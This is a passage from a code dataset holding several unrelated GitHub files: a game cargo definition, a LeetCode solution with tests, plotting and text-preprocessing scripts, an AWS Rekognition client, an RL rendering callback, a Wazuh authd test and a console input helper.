cargo_payment_list_colour='162',\n              is_freight='1',\n              cargo_classes='bitmask(CC_PIECE_GOODS, CC_LIQUID)',\n              cargo_label='EOIL',\n              town_growth_effect='TOWNGROWTH_NONE',\n              town_growth_multiplier='1.0',\n              units_of_cargo='82',\n              items_of_cargo='string(STR_CARGO_UNIT_EDIBLE_OIL)',\n              penalty_lowerbound='20',\n              single_penalty_length='128',\n              price_factor='122',\n              capacity_multiplier='1',\n              icon_indices=(0, 3))\n","repo_name":"EmperorJake/XIS","sub_path":"src/cargos/edible_oil.py","file_name":"edible_oil.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"18406306569","text":"import itertools; import math; import operator; import random; from bisect import *; from collections import deque, defaultdict, Counter, OrderedDict; from functools import reduce; from heapq import *; import unittest; from typing import List; import functools\ndef get_sol(): return Solution()\nclass Solution:\n    # https://leetcode.com/problems/cherry-pickup/discuss/329945/Very-easy-to-follow-%3A-step-by-step-recursive-backtracking-with-memoization-N4.\n    def cherryPickup(self, grid: List[List[int]]) -> int:\n        @functools.lru_cache(None)\n        def dfs(r1,c1,r2,c2): # two people collecting at the same 
time\n            if r1>=n or r2>=n or c1>=n or c2>=n: return float('-inf')\n            if grid[r1][c1]==-1: return float('-inf')\n            if grid[r2][c2]==-1: return float('-inf')\n            if r1==n-1 and c1==n-1:\n                return grid[r1][c1]\n            if r2==n-1 and c2==n-1:\n                return grid[r2][c2]\n\n            if r1==r2 and c1==c2: # two persons standing at the same place. only one person will collect if any.\n                ans=grid[r1][c1]\n            else:\n                ans=grid[r1][c1]+grid[r2][c2]\n\n            tmp = max(dfs(r1+1,c1,r2+1,c2),\n                      dfs(r1+1,c1,r2,c2+1),\n                      dfs(r1,c1+1,r2+1,c2),\n                      dfs(r1,c1+1,r2,c2+1)\n                      )\n            return ans+tmp\n\n        n=len(grid)\n        res= dfs(0,0,0,0)\n        return res if res!=float('-inf') else 0\nclass Solution2:\n    # wrong\n    def cherryPickup(self, grid: List[List[int]]) -> int:\n        def dfs(i, j, end_i, end_j, dirs):\n            # returns [best collectable sum, path taken]; bounds/thorn cells are invalid\n            if not 0<=i<n or not 0<=j<n or grid[i][j]==-1:\n                return [float('-inf'), []]\n            if i==end_i and j==end_j:\n                return [grid[i][j], [(i,j)]]\n            ans, path = float('-inf'), []\n            for d in dirs:\n                tmp, tmp_path = dfs(i+d[0], j+d[1], end_i, end_j, dirs)\n                if tmp>ans:\n                    ans=tmp\n                    path=tmp_path\n            return [grid[i][j]+ans,[(i,j)]+path]\n\n        n=len(grid)\n        dirs_go,dirs_comeback=[(1,0),(0,1)],[(-1,0),(0,-1)]\n        go,path= dfs(0, 0, n - 1, n - 1, dirs_go)\n        for i,j in path:\n            grid[i][j]=0\n        comeback,_= dfs(n - 1, n - 1, 0, 0, dirs_comeback)\n        res=go+comeback\n        return res if res!=float('-inf') else 0\n\nclass MyTestCase(unittest.TestCase):\n    def test1(self):\n        Output= 5\n        self.assertEqual(Output, get_sol().cherryPickup(grid = [[0,1,-1],[1,0,-1],[1,1,1]]))\n    def test2(self):\n        Output= 0\n        self.assertEqual(Output, get_sol().cherryPickup(grid = [[1,1,-1],[1,-1,1],[-1,1,1]]))\n    def test3(self):\n        grid = [[1,1,0,1],\n                [0,0,0,0],\n                [0,0,0,0],\n                [1,0,1,1]]\n        Output= 6\n        self.assertEqual(Output, get_sol().cherryPickup(grid))\n    def test4(self):\n        grid=[[1,1,1,0,1],\n              [0,0,0,0,0],\n              [0,0,0,0,0],\n              [0,0,0,0,0],\n              [1,0,1,1,1]]\n        Output= 8\n        self.assertEqual(Output, get_sol().cherryPickup(grid))\n    def test5(self):\n        Output= 15\n        self.assertEqual(Output, get_sol().cherryPickup(grid = [[1,1,1,1,0,0,0],[0,0,0,1,0,0,0],[0,0,0,1,0,0,1],[1,0,0,1,0,0,0],[0,0,0,1,0,0,0],[0,0,0,1,0,0,0],[0,0,0,1,1,1,1]]))\n    # def test5(self):\n    # def test6(self):\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc741.py","file_name":"lc741.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"18627957272","text":"import matplotlib.pyplot as plt\n\n\n#runs through file and returns list of ones in each slot\ndef getnumberofOnes(cyclelength,numberofslots,filename):\n    f=open(filename,'r')\n    y = f.read()\n    counter=0\n    listforplot =[]\n    perslot =cyclelength*36000/numberofslots\n    for p in xrange(0,numberofslots):\n        counter=0\n        for x in y[p*perslot:(p+1)*perslot]:\n            if x == \"1\":\n                counter=counter+1\n        listforplot.append(counter)\n    return(listforplot)\n#plots timeline based on inputs\ndef plot(cyclelength,numberofslots,listofgroup):\n    slotlist=[]\n    fig, ax = plt.subplots()\n    plt.subplots_adjust(bottom=.73, left=.08, right=.95, top=.99, hspace=.35,wspace=0)\n    z=len(listofgroup)\n    colorlist = ['b', 'g', 'r', 'c', 'm', 'y', 'k']\n    listofgroup.reverse()\n    newlist =[]\n    for x in xrange(0,z):\n        newlist.append(x*2.5)\n        a =getnumberofOnes(cyclelength,numberofslots,str(x+1)+\".soundclout\")\n        for y in xrange(0,numberofslots):\n            slotlist.append(y)\n            if a[y]!=0:\n                ax.broken_barh([(slotlist[y], 1)],(2.5*x,2.5), facecolors='blue')\n    ax.set_ylim(0 ,2.5*len(newlist))\n    ax.set_xlim(0, numberofslots)\n    ax.set_xlabel('slots')\n    ax.set_ylabel('Groups')\n    ax.set_yticks(newlist)\n    ax.set_yticklabels(listofgroup)\n    plt.savefig('timeline.png',bbox_inches='tight',frameon=False)\n    #plt.show()\n#z= 
['group1','group2','group3']\n#plot(10,z)\n","repo_name":"SCCapstone/SoundClout","sub_path":"kivy/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"32242897223","text":"from bs4 import BeautifulSoup\r\nfrom bs4.element import NavigableString, Tag\r\nfrom koalanlp.Util import initialize, finalize\r\nfrom koalanlp import API\r\nfrom koalanlp.proc import SentenceSplitter, Tagger\r\nfrom textrankr import TextRank\r\n\r\nimport hanja\r\nimport sys\r\nimport os\r\nimport re\r\n\r\ndef process(target):\r\n\r\n    # remove bylines\r\n    target = re.sub(r'\\. *\\S+ +\\S+ +\\w+@(\\w+\\.)+\\w+', '.', target)\r\n    target = re.sub(r'\\S+ +\\S+ +\\w+@(\\w+\\.)+\\w+', '.', target)\r\n\r\n    # remove parentheses\r\n    target = re.sub(r'\\([^)]+\\)', ' ', target)\r\n    target = re.sub(r'\\[[^)]+\\]', ' ', target)\r\n    target = re.sub(r'\\<[^)]+\\>', ' ', target)\r\n    target = re.sub(r'\\【[^)]+\\】', ' ', target)\r\n\r\n    # replace hanja with hangul (hanja.translate returns the converted string)\r\n    target = hanja.translate(target, 'substitution')\r\n\r\n    # remove special characters except necessary punctuations\r\n    target = re.sub(r'[^A-Za-zㄱ-ㅎㅏ-ㅣ가-힣0-9\\%\\-\\_\\.\\,\\?\\!\\/\\\"\\'ㆍ·。、“”‘’『』《》〈〉「」\\~○×□…\\ ]', ' ', target)\r\n\r\n    # initialize korean language analyzers\r\n    splitter = SentenceSplitter(API.HNN)\r\n    tagger = Tagger(API.KHAIII, kha_resource=\"/usr/local/share/khaiii\")\r\n\r\n    # split text into sentences\r\n    sentences = splitter(target)\r\n\r\n    # regularize sentences (ex: 해서->하여서)\r\n    target_regularized = ''\r\n    for sent in sentences:\r\n        sent = tagger.tagSentence(sent)\r\n        sent_regularized = []\r\n        for word in sent[0].words:\r\n            word_regularized = ''\r\n            for m in word.morphemes:\r\n                if m.tag.startswith('J'):  # if it is a particle (조사)\r\n                    word_regularized += ' '  # add space\r\n                word_regularized += m.surface\r\n            sent_regularized.append(word_regularized)\r\n        target_regularized += '\\n' + ' '.join(sent_regularized)\r\n\r\n    # regularize whitespaces\r\n    target_regularized = re.sub(r' +', ' ', target_regularized)\r\n\r\n    return target_regularized\r\n\r\nif len(sys.argv) != 3:\r\n    print(\"Usage: python preprocessor.py <load_path> <save_path>\")\r\n    sys.exit()\r\n\r\ninitialize(KHAIII='LATEST', HNN='LATEST')\r\n\r\nload_path = sys.argv[1]\r\nsave_path = sys.argv[2]\r\n\r\nfiles = [f for f in os.listdir(load_path) if os.path.isfile(os.path.join(load_path, f)) and f.endswith(\"story\")]\r\nfor fi in files:\r\n    print('id: {}'.format(fi))\r\n    with open(os.path.join(load_path, fi), 'r', encoding='utf-8') as f:\r\n        # get title\r\n        assert \"@title\\n\" == f.readline()\r\n\r\n        title = \"\"\r\n        content = \"\"\r\n\r\n        line = f.readline()\r\n        while line != '@content\\n':\r\n            title += line\r\n            line = f.readline()\r\n        content = f.read()\r\n\r\n        # specify skip target article titles (e.g. 
photo only articles)\r\n        if any(x in title for x in ['포토','사진', '경향이 찍은 오늘']):\r\n            print(\"skipped\")\r\n            continue\r\n\r\n        # initialize html parser\r\n        bs = BeautifulSoup(content, 'html.parser')\r\n\r\n        # remove html tag\r\n        content = ''\r\n        summary = ''\r\n        for elem in bs.children:  # get article body\r\n            if type(elem) is Tag:  # html tag\r\n                if elem.name == 'br':\r\n                    content += '\\n'\r\n                elif elem.name == 'p':\r\n                    content += elem.text + '\\n'\r\n                else:\r\n                    content += elem.text\r\n            elif type(elem) is NavigableString:  # plain text\r\n                content += elem\r\n\r\n        # get summary (the first paragraph of an article)\r\n        flag_paragraph_change = False\r\n        for sent in content.split('\\n'):\r\n            if len(sent.strip()) == 0:  # newline\r\n                flag_paragraph_change = True  # if previous sentence is newline\r\n                if not len(summary):\r\n                    continue\r\n                else:\r\n                    break\r\n\r\n            flag_paragraph_change = False\r\n            if sent.strip().endswith('.'):  # only if the sentence ends with '.' (full sentence)\r\n                summary += sent\r\n\r\n        # process text\r\n        content = process(content)\r\n\r\n        textrank = TextRank(content)\r\n        summary = textrank.summarize()\r\n\r\n        print(summary)\r\n\r\n        # save processed files\r\n        if not os.path.exists(save_path):\r\n            os.mkdir(save_path)\r\n        with open(os.path.join(save_path, fi), 'w', encoding='utf-8') as f:\r\n            f.write(\"@title\\n\")\r\n            f.write(title.strip() + \"\\n\")\r\n            f.write(\"@summary\\n\")\r\n            f.write(summary.strip() + \"\\n\")\r\n            f.write(\"@content\\n\")\r\n            f.write(content.strip() + \"\\n\")\r\n\r\nfinalize()","repo_name":"junbread/news-crawler","sub_path":"preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":4443,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37743944449","text":"import sys\nimport json\nimport asyncio\nimport aioboto3\nimport time\n\nwith open(\"src/aws.json\", \"r\") as f:\n    AWS_PROFILES = json.load(f)\n\ndef get_image_from_file(filename):\n    with open(filename, \"rb\") as f:\n        image_bytes= f.read()\n\n    return image_bytes\n\nclass FaceDetector:\n    \"\"\"\n    Face detection class\n\n    Usage:\n    await FaceDetector().detect(image_files)\n    \"\"\"\n    def __init__(self):\n        self.result = []\n\n    async def __single(self, image_file, client):\n        filename = image_file\n        result = await client.detect_faces(\n            Image={\n                'Bytes': get_image_from_file(image_file),\n            },\n            Attributes=[\n                'ALL',\n            ]\n        )\n\n        self.result.append({\"filename\":filename, \"result\":result})\n        print(\"finished: \" + filename)\n        #print(len(result['FaceDetails']))\n\n    async def detect(self, image_files):\n        \"\"\"\n        Face detection method\n\n        :param list image_files: list of image file names\n        \"\"\"\n        async with aioboto3.client('rekognition',\n            region_name=AWS_PROFILES['AWS_DEFAULT_REGION'],\n            aws_access_key_id=AWS_PROFILES['AWS_ACCESS_KEY_ID'],\n            aws_secret_access_key=AWS_PROFILES['AWS_SECRET_ACCESS_KEY'],\n            ) as client:\n            await asyncio.gather(*[self.__single(image_file, client) for image_file in image_files])\n\n    def get_result(self):\n        return self.result\n\nasync def main(image_files):\n    detectfaces = FaceDetector()\n\n    start = time.time()\n    await detectfaces.detect(image_files)\n    elapsed = time.time() - start\n\n    print(f\"{elapsed * 1000:.0f}ms\")  # milliseconds\n    print(detectfaces.get_result())\n\nif __name__ == '__main__':\n    
asyncio.run(main(sys.argv[1:]))\n","repo_name":"t-morisawa/rekognition","sub_path":"src/rekognition.py","file_name":"rekognition.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41799127696","text":"import logging\nimport time\nfrom dataclasses import dataclass, field\nfrom typing import TYPE_CHECKING, Union\n\nimport numpy as np\n\nfrom srl.base.define import EnvObservationTypes, PlayRenderModes\nfrom srl.base.rl.worker_run import WorkerRun\nfrom srl.runner.callback import Callback\nfrom srl.runner.runner import Runner\nfrom srl.utils.render_functions import text_to_rgb_array\n\nlogger = logging.getLogger(__name__)\n\nif TYPE_CHECKING:\n from matplotlib.animation import ArtistAnimation\n\n\n@dataclass\nclass Rendering(Callback):\n mode: Union[str, PlayRenderModes] = PlayRenderModes.none\n kwargs: dict = field(default_factory=lambda: {})\n step_stop: bool = False\n render_skip_step: bool = True\n\n # render option\n render_interval: float = -1 # ms\n render_scale: float = 1.0\n font_name: str = \"\"\n font_size: int = 12\n\n def __post_init__(self):\n self.frames = []\n self.info_maxw = 0\n self.info_maxh = 0\n self.env_maxw = 0\n self.env_maxh = 0\n self.rl_maxw = 0\n self.rl_maxh = 0\n self.rl_state_maxw = 0\n self.rl_state_maxh = 0\n\n self.info_text = \"\"\n self.env_img = None\n self.rl_text = \"\"\n self.rl_img = None\n self.rl_state_image = None\n self.font = None\n\n self.mode = PlayRenderModes.from_str(self.mode)\n\n def on_episodes_begin(self, runner: Runner) -> None:\n assert runner.state.env is not None\n self.render_interval = runner.state.env.set_render_options(\n self.render_interval,\n self.render_scale,\n self.font_name,\n self.font_size,\n )\n\n def on_step_action_before(self, runner: Runner) -> None:\n self._render_env(runner)\n\n def on_step_begin(self, runner: Runner) -> None:\n self._render_worker(runner)\n self._add_image()\n\n if self.step_stop:\n input(\"Enter to continue:\")\n\n def on_skip_step(self, runner: Runner):\n if not self.render_skip_step:\n return\n self._render_env(runner, True)\n self._add_image()\n\n def on_episode_end(self, runner: Runner) -> None:\n self._render_env(runner)\n self._add_image()\n\n def on_episodes_end(self, runner: Runner) -> None:\n if self.step_stop:\n input(\"Enter to continue:\")\n\n # -----------------------------------------------\n\n def _render_env(self, runner: Runner, skip_step=False):\n env = runner.state.env\n assert env is not None\n\n # --- info text\n action = runner.state.action\n worker_idx = runner.state.worker_idx\n worker: WorkerRun = runner.state.workers[worker_idx]\n info_text = f\"### {env.step_num}\"\n if isinstance(action, float):\n a1 = f\"{action:.3f}\"\n else:\n a1 = f\"{action}\"\n a2 = env.action_to_str(action)\n if a1 != a2:\n action = f\"{a1}({a2})\"\n info_text += f\", action {action}\"\n info_text += \", rewards[\" + \",\".join([f\"{r:.3f}\" for r in env.step_rewards]) + \"]\"\n if env.done:\n info_text += f\", done({env.done_reason})\"\n if env.player_num > 1:\n info_text += f\", next {env.next_player_index}\"\n if skip_step:\n info_text += \"(skip frame)\"\n info_text += f\"\\nenv {env.info}\"\n info_text += f\"\\nwork{worker_idx: <2d}{worker.info}\"\n self.info_text = info_text\n\n # --- render_terminal\n if self.mode == PlayRenderModes.terminal:\n print(info_text)\n\n # --- env text\n env.render_terminal(**self.kwargs)\n\n # --- render window\n if self.mode == PlayRenderModes.window:\n 
env.render_window(**self.kwargs)\n\n        if self.mode == PlayRenderModes.rgb_array:\n            self.env_img = env.render_rgb_array(**self.kwargs)\n            self.env_maxw = max(self.env_maxw, self.env_img.shape[1])\n            self.env_maxh = max(self.env_maxh, self.env_img.shape[0])\n\n    def _add_image(self):\n        # --- rgb\n        if self.mode == PlayRenderModes.rgb_array:\n            info_img = text_to_rgb_array(self.info_text)\n            self.info_maxw = max(self.info_maxw, info_img.shape[1])\n            self.info_maxh = max(self.info_maxh, info_img.shape[0])\n\n            self.frames.append(\n                {\n                    \"info_image\": info_img,\n                    \"env_image\": self.env_img,\n                    \"rl_image\": self.rl_img,\n                    \"rl_state_image\": self.rl_state_image,\n                }\n            )\n\n    def _render_worker(self, runner: Runner):\n        worker = runner.state.workers[runner.state.worker_idx]\n\n        # --- render_terminal\n        if self.mode == PlayRenderModes.terminal:\n            worker.render_terminal(**self.kwargs)\n\n        # --- rgb\n        if self.mode == PlayRenderModes.rgb_array:\n            self.rl_img = worker.render_rgb_array(**self.kwargs)\n            self.rl_maxw = max(self.rl_maxw, self.rl_img.shape[1])\n            self.rl_maxh = max(self.rl_maxh, self.rl_img.shape[0])\n\n            # input image fed to the RL side\n            if EnvObservationTypes.is_image(worker.config.env_observation_type):\n                # convert to a COLOR image\n                _img = worker.state.copy()\n                if _img.max() <= 1:\n                    _img *= 255\n                if worker.config.env_observation_type == EnvObservationTypes.GRAY_2ch:\n                    _img = _img[..., np.newaxis]\n                    _img = np.tile(_img, (1, 1, 3))\n                elif worker.config.env_observation_type == EnvObservationTypes.GRAY_3ch:\n                    _img = np.tile(_img, (1, 1, 3))\n                self.rl_state_image = _img.astype(np.uint8)\n                self.rl_state_maxw = max(self.rl_state_maxw, self.rl_state_image.shape[1])\n                self.rl_state_maxh = max(self.rl_state_maxh, self.rl_state_image.shape[0])\n\n    # -----------------------------------------------\n    def _create_image(self, frame):\n        import cv2\n\n        info_image = frame[\"info_image\"]\n        env_image = frame[\"env_image\"]\n        rl_image = frame[\"rl_image\"]\n        rl_state_image = frame[\"rl_state_image\"]\n\n        # --- add padding margins\n        padding = 2\n        info_image = cv2.copyMakeBorder(\n            info_image, padding, padding, padding, padding, cv2.BORDER_CONSTANT, value=(0, 0, 0)\n        )\n        if rl_image is not None:\n            rl_image = cv2.copyMakeBorder(\n                rl_image, padding, padding, padding, padding, cv2.BORDER_CONSTANT, value=(0, 0, 0)\n            )\n        env_image = cv2.copyMakeBorder(\n            env_image, padding, padding, padding, padding, cv2.BORDER_CONSTANT, value=(255, 255, 255)\n        )\n        if rl_state_image is not None:\n            rl_state_image = cv2.copyMakeBorder(\n                rl_state_image, padding, padding, padding, padding, cv2.BORDER_CONSTANT, value=(255, 255, 255)\n            )\n\n        # --- info + rl_image: fill the leftover space on the right\n        if rl_image is None:\n            right_img = info_image\n            right_maxh = self.info_maxh + padding * 2\n        else:\n            maxw = max(self.info_maxw + padding * 2, self.rl_maxw + padding * 2)\n            info_w = maxw - info_image.shape[1]\n            rl_w = maxw - rl_image.shape[1]\n            info_image = cv2.copyMakeBorder(info_image, 0, 0, 0, info_w, cv2.BORDER_CONSTANT, value=(0, 0, 0))\n            rl_image = cv2.copyMakeBorder(rl_image, 0, 0, 0, rl_w, cv2.BORDER_CONSTANT, value=(0, 0, 0))\n            right_img = cv2.vconcat([info_image, rl_image])  # vertical concat  # type: ignore , MAT\n            right_maxh = self.info_maxh + self.rl_maxh + padding * 4\n\n        # --- env + rl_state:\n        if rl_state_image is None:\n            left_img = env_image\n            left_maxh = self.env_maxh + padding * 2\n        else:\n            maxw = max(self.env_maxw + padding * 2, self.rl_state_maxw + padding * 2)\n            env_w = maxw - env_image.shape[1]\n            rl_state_w = maxw - rl_state_image.shape[1]\n            env_image = cv2.copyMakeBorder(env_image, 0, 0, 0, env_w, 
cv2.BORDER_CONSTANT, value=(255, 255, 255))\n            rl_state_image = cv2.copyMakeBorder(\n                rl_state_image, 0, 0, 0, rl_state_w, cv2.BORDER_CONSTANT, value=(255, 255, 255)\n            )\n            left_img = cv2.vconcat([env_image, rl_state_image])  # vertical concat  # type: ignore , MAT\n            left_maxh = self.env_maxh + self.rl_state_maxh + padding * 4\n\n        # --- left_img + right_img: fill the leftover space at the bottom\n        maxh = max(left_maxh, right_maxh)\n        left_h = maxh - left_img.shape[0]\n        right_h = maxh - right_img.shape[0]\n        left_img = cv2.copyMakeBorder(left_img, 0, left_h, 0, 0, cv2.BORDER_CONSTANT, value=(255, 255, 255))\n        right_img = cv2.copyMakeBorder(right_img, 0, right_h, 0, 0, cv2.BORDER_CONSTANT, value=(0, 0, 0))\n        img = cv2.hconcat([left_img, right_img])  # horizontal concat  # type: ignore , MAT\n\n        return img\n\n    # -----------------------------------------------\n\n    def create_anime(\n        self,\n        interval: float = -1,  # ms\n        scale: float = 1.0,\n        draw_info: bool = True,\n    ) -> \"ArtistAnimation\":\n        assert len(self.frames) > 0\n\n        import matplotlib.pyplot as plt\n        from matplotlib.animation import ArtistAnimation\n\n        t0 = time.time()\n\n        maxw = 0\n        maxh = 0\n        images = []\n        for f in self.frames:\n            if draw_info:\n                img = self._create_image(f)\n            else:\n                img = f[\"env_image\"]\n            if img is None:\n                continue\n            images.append(img)\n            maxw = max(maxw, img.shape[1])\n            maxh = max(maxh, img.shape[0])\n\n        # --- interval\n        if interval <= 0:\n            interval = self.render_interval\n        if interval <= 0:\n            interval = 1000 / 60\n\n        # --- size (inch = pixel / dpi)\n        fig_dpi = 100\n        fig = plt.figure(\n            dpi=fig_dpi,\n            figsize=(scale * maxw / fig_dpi, scale * maxh / fig_dpi),\n            tight_layout=dict(pad=0),\n        )\n\n        # --- animation\n        ax = fig.add_subplot(1, 1, 1)\n        ax.axis(\"off\")\n        images = [[ax.imshow(img, animated=True)] for img in images]\n        anime = ArtistAnimation(fig, images, interval=interval, repeat=False)\n        # plt.close(fig)  # ideally we would close the figure so it does not linger in notebooks, but closing it breaks the gym side\n\n        logger.info(\n            f\"animation created(frames: {len(self.frames)}, interval: {interval:.1f}ms, time {time.time() - t0:.1f}s)\"\n        )\n        return anime\n\n    def display(\n        self,\n        interval: float = -1,  # ms\n        scale: float = 1.0,\n        draw_info: bool = True,\n    ) -> None:\n        if len(self.frames) == 0:\n            return\n\n        from IPython import display  # type: ignore\n\n        t0 = time.time()\n        anime = self.create_anime(interval=interval, scale=scale, draw_info=draw_info)\n        display.display(display.HTML(data=anime.to_jshtml()))  # type: ignore\n        logger.info(\"display created({:.1f}s)\".format(time.time() - t0))\n","repo_name":"pocokhc/simple_distributed_rl","sub_path":"srl/runner/callbacks/rendering.py","file_name":"rendering.py","file_ext":"py","file_size_in_byte":11161,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"515773016","text":"from urllib.error import URLError\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom .formatter.Formatter import Formatter\r\nfrom typing import Type\r\nimport re\r\n\r\n\r\nclass Problem:\r\n    def __init__(self, arg: str, F: Type[Formatter]):\r\n        url_pattern = F.url.replace('?', '\\?')\r\n        pattern = rf'((http|https)://)?(www.)?({url_pattern})?({F.index_pattern})$'\r\n        \r\n        if re.match(pattern, arg):\r\n            index = re.match(pattern, arg).group(5)\r\n        else:\r\n            raise(URLError('Invalid URL'))\r\n\r\n        self.url = f'http://{F.url}{index}'\r\n        r = requests.get(self.url)\r\n        if r.status_code == 200:\r\n            soup = BeautifulSoup(r.text, 'html.parser')\r\n            formatter = F(soup)\r\n\r\n            self.title = formatter.get_title()\r\n            self.statistics = formatter.get_statistics()\r\n            self.content = formatter.get_content()\r\n            
self.theinput = formatter.get_theinput()\n self.theoutput = formatter.get_theoutput()\n self.tags = formatter.get_tags() or '\\u200b'\n self.examples = formatter.get_examples()\n self.note = formatter.get_note() or '\\u200b'\n\n else: print(r.status_code)\n \n \n def to_embed_dict(self) -> None:\n embed_dict = {}\n embed_dict['title'] = self.title\n embed_dict['description'] = self.statistics\n embed_dict['url'] = self.url\n fields = []\n add_field = lambda n, v, b = False: fields.append({ 'name':n, 'value':v,'inline':b })\n\n add_field('[內容]', self.content)\n add_field('[輸入]', self.theinput)\n add_field('[輸出]', self.theoutput)\n\n for i, example in enumerate(self.examples, 1):\n input, output = example\n add_field( f'範例輸入 {i:02d}', f'```{input}```', True)\n add_field( f'範例輸出 {i:02d}', f'```{output}```', True)\n add_field( '\\u200b', '\\u200b', False)\n\n add_field('[提示]', self.note)\n add_field('[標籤]', self.tags)\n embed_dict['fields'] = fields\n return embed_dict","repo_name":"tseng-Chen/TheBot","sub_path":"cogs/online_judge/Problem.py","file_name":"Problem.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18381074281","text":"import os\nimport time\nimport pytest\n\nfrom wazuh_testing.tools.configuration import load_wazuh_configurations\nfrom wazuh_testing.tools.file import read_yaml\nfrom wazuh_testing.authd import create_authd_request, validate_authd_response, validate_authd_logs, \\\n AUTHD_KEY_REQUEST_TIMEOUT\n\n\n# Data paths\ndata_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')\nconfigurations_path = os.path.join(data_path, 'template_configuration.yaml')\ntests_path = os.path.join(data_path, 'test_cases', 'valid_config')\n\n# Configurations\nconfigurations = load_wazuh_configurations(configurations_path, __name__)\nlocal_internal_options = {'authd.debug': '2'}\n\n# Tests\ntests = []\ntest_case_ids = []\nfor file in os.listdir(tests_path):\n group_name = file.split('.')[0]\n file_tests = read_yaml(os.path.join(tests_path, file))\n tests = tests + file_tests\n test_case_ids = test_case_ids + [f\"{group_name} {test_case['name']}\" for test_case in file_tests]\n\n# Variables\nlog_monitor_paths = []\n\nreceiver_sockets_params = [(('localhost', 1515), 'AF_INET', 'SSL_TLSv1_2')]\nmonitored_sockets_params = [('wazuh-authd', None, True), ('wazuh-db', None, True)]\nreceiver_sockets, monitored_sockets, log_monitors = None, None, None # Set in the fixtures\n\n\n# Fixtures\n@pytest.fixture(scope='module')\ndef get_configuration(request):\n \"\"\"\n Get configurations from the module\n \"\"\"\n return request.param\n\n\n@pytest.fixture(scope='function', params=tests, ids=test_case_ids)\ndef get_current_test_case(request):\n \"\"\"\n Get current test case from the module\n \"\"\"\n return request.param\n\n\ndef test_authd_force_options(get_current_test_case, configure_local_internal_options_module, override_authd_force_conf,\n insert_pre_existent_agents, file_monitoring, restart_authd_function,\n wait_for_authd_startup_function, connect_to_sockets_function, tear_down):\n '''\n description:\n Checks that every input message in authd port generates the adequate output.\n\n wazuh_min_version:\n 4.3.0\n\n tier: 0\n\n parameters:\n - get_current_test_case:\n type: fixture\n brief: gets the current test case from the tests' list\n - configure_local_internal_options_module:\n type: fixture\n brief: Configure the local internal options file.\n - override_authd_force_conf:\n 
type: fixture\n brief: Modified the authd configuration options.\n - insert_pre_existent_agents:\n type: fixture\n brief: adds the required agents to the client.keys and global.db\n - file_monitoring:\n type: fixture\n brief: Handle the monitoring of a specified file.\n - restart_authd_function:\n type: fixture\n brief: stops the wazuh-authd daemon.\n - wait_for_authd_startup_function:\n type: fixture\n brief: Waits until Authd is accepting connections.\n - connect_to_sockets_function:\n type: fixture\n brief: Bind to the configured sockets at function scope.\n - tear_down:\n type: fixture\n brief: Roll back the daemon and client.keys state after the test ends.\n\n assertions:\n - The received output must match with expected.\n - Verifies the registration responses.\n\n input_description:\n Different test cases are contained in external YAML files (valid_config folder) which includes\n different possible values for the current authd settings.\n\n expected_output:\n - Registration request responses on Authd socket.\n '''\n\n authd_sock = receiver_sockets[0]\n validate_authd_logs(get_current_test_case.get('log', []))\n\n for stage in get_current_test_case['test_case']:\n # Reopen socket (socket is closed by manager after sending message with client key)\n authd_sock.open()\n authd_sock.send(create_authd_request(stage['input']), size=False)\n timeout = time.time() + AUTHD_KEY_REQUEST_TIMEOUT\n response = ''\n while response == '':\n response = authd_sock.receive().decode()\n if time.time() > timeout:\n raise ConnectionResetError('Manager did not respond to sent message!')\n result, err_msg = validate_authd_response(response, stage['output'])\n assert result == 'success', f\"Failed stage '{stage['description']}': {err_msg} Complete response: '{response}'\"\n validate_authd_logs(stage.get('log', []))\n","repo_name":"wazuh/wazuh-qa","sub_path":"tests/integration/test_authd/force_options/test_authd_force_options.py","file_name":"test_authd_force_options.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"25093108651","text":"# -*- coding: utf-8 -*-\nimport time\nfrom termcolor import cprint\n\n\ndef user_input(data, choice=None):\n cprint('\\n Выберете действие: ', color='yellow')\n for num, bound_actions in enumerate(data):\n print(f'{num + 1}. {bound_actions[1]()}')\n print(f'{len(data) + 1}. Сдаться и выйти из игры')\n while True:\n try:\n choice = int(input(\"Ваш ход: \")) - 1\n assert choice > - 1\n cprint(f'\\n \\n Вы выбрали {data[choice][1]()} <<{data[choice][0]}>> \\n \\n', color='magenta')\n except (IndexError, AssertionError):\n if choice == len(data):\n raise\n else:\n print('Такого варианта нет. Попробуйте еще раз')\n continue\n except ValueError:\n print('Это не целочисленное значение. 
